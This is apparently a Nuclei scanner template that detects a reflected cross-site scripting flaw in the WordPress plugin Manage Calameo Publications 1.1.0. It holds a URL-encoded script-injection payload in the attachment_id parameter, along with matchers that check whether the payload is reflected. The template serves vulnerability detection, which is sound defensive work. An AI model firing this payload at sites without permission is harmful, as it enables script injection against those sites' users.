id: calameo-publications-xss

info:
  name: WordPress Manage Calameo Publications 1.1.0 - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    WordPress Manage Calameo Publications 1.1.0 is vulnerable to reflected cross-site scripting via  thickbox_content.php and the attachment_id parameter.
  reference:
    - https://codevigilant.com/disclosure/wp-plugin-athlon-manage-calameo-publications-a3-cross-site-scripting-xss/
    - https://wpscan.com/vulnerability/83343eb3-bb4c-4b82-adf6-745882f872cc
    - https://wordpress.org/plugins/athlon-manage-calameo-publications/
  metadata:
    verified: true
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: wordpress,wp-plugin,xss,wp,wpscan

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/athlon-manage-calameo-publications/thickbox_content.php?attachment_id=id%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%26"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ath_upload_calameo_publication(id\"><script>alert(document.domain)</script>&)'

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/07
